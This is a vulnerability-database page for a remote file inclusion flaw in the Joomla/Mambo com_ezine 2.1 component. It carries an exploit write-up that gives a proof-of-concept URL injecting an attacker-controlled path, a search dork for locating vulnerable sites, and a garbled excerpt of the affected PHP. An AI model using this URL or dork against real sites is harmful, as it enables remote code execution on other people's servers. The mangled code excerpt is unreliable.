Related Weaknesses
CWE-ID |
Weakness Name |
Source |
CWE-94 |
Improper Control of Generation of Code ('Code Injection') The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment. |
|
Metrics
Metrics |
Score |
Severity |
CVSS Vector |
Source |
V2 |
7.5 |
|
AV:N/AC:L/Au:N/C:P/I:P/A:P |
nvd@nist.gov |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 10178
Publication date : 2009-10-19 22h00 +00:00
Author : kaMtiEz
EDB Verified : Yes
#####################################################################################################
## Joomla / Mambo Component com_ezine Remote File Include vulnerability ##
## Author : kaMtiEz (kamzcrew@yahoo.com) ##
## Homepage : http://www.indonesiancoder.com ##
## Date : October 20 2009 ##
#####################################################################################################
# Hello My Name Is : ##
# __ _____ __ ._____________ ##
# | | _______ / \_/ |_|__\_ _____/_______ ##
# | |/ /\__ \ / \ / \ __\ || __)_\___ / ##
# | < / __ \_/ Y \ | | || \/ / ##
# |__|_ \(____ /\____|__ /__| |__/_______ /_____ \ ##
# \/ \/ \/ \/ \/ -=- INDONESIAN CODER -=- KILL-9 CREW -=- ##
#####################################################################################################
[ Software Information ]
[+] Vendor : http://designformamb0.c0m
[+] Download : -
[+] version : 2.1
[+] Vulnerability : RFI
[+] price : FREE
[+] Dork : inurl:"com_ezine"
[+] Location : INDONESIA
[DESCRIPTION]
/**
* eZine component v2.1
*
* @copyright Nguyen Manh Cuong
* Author`s email : cu0ngnm@designformamb0.c0m
* Author`s hompage : http://designformamb0.c0m
*
* @license Commercial Product - Single Site License or Free to Use with Limitation
**/
###############################################
[ PoC ]
http://server/components/com_ezine/class/php/d4m_ajax_pagenav.php?GLOBALS[mosConfig_absolute_path]=[INDONESIANCODER-Ev1L]
[ Bugs File ]
[+] d4m_ajax_pagenav.php
total / $this->limit );
$this_page = ceil( ($this->limitstart+1) / $this->limit );
$start_loop = (floor(($this_page-1)/$displayed_pages))*$displayed_pages+1;
if ($start_loop + $displayed_pages - 1 1) {
$page = ($this_page - 2) * $this->limit;
$txt .= '<< '. _PN_START .' ';
$txt .= '< '. _PN_PREVIOUS .' ';
} else {
$txt .= '<< '. _PN_START .' ';
$txt .= '< '. _PN_PREVIOUS .' ';
}
for ($i=$start_loop; $i limit;
if ($i == $this_page) {
$txt .= ''. $i .' ';
} else {
$txt .= ''. $i .' ';
}
}
if ($this_page limit;
$end_page = ($total_pages-1) * $this->limit;
$txt .= ''. _PN_NEXT .' > ';
$txt .= ''. _PN_END .' >>';
} else {
$txt .= ''. _PN_NEXT .' > ';
$txt .= ''. _PN_END .' >>';
}
return $txt;
}
}
?>
[ FIX ]
Tukulesto said : talk to Aurakasih .. lol
kaMtiEz said : tanya ama AuraKasih .. hha
M3Nw5 said : takon Karo AuraKasih .. hha
Arianom Said : coba kau tanya aura kasih lae
Joke.. ;)
###############################################
[ Thx TO ]
[+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW
[+] tukulesto,M3NW5,arianom,tiw0L,Pathloader,abah_benu,VycOd,och3_an3h
[+] Contrex,onthel,yasea,bugs,olivia,Jovan,Aar,Ardy,invent,Ronz
[+] Coracore,black666girl,NepT,ichal,tengik,Gh4mb4s,rendy and YOU!!
[ NOTE ]
[+] makasih buad babe and enyak .... muach .. untuk pacarkuwh luph u mwahhhhh
[+] makasih buat om tukulesto buat perl exploit nye .. huahhh
[+] aurakasih .. sekarang pilih antara kaMtiEz . Tukulesto . M3NW5 ... hha
[+] om tukulesto kutunggu kau di kotaku .. :D -----------------------------------------------------------------]
Products Mentioned
Configuraton 0
Joomla>>Joomla\! >> Version *
Designforjoomla>>Com_ezine >> Version 2.1
References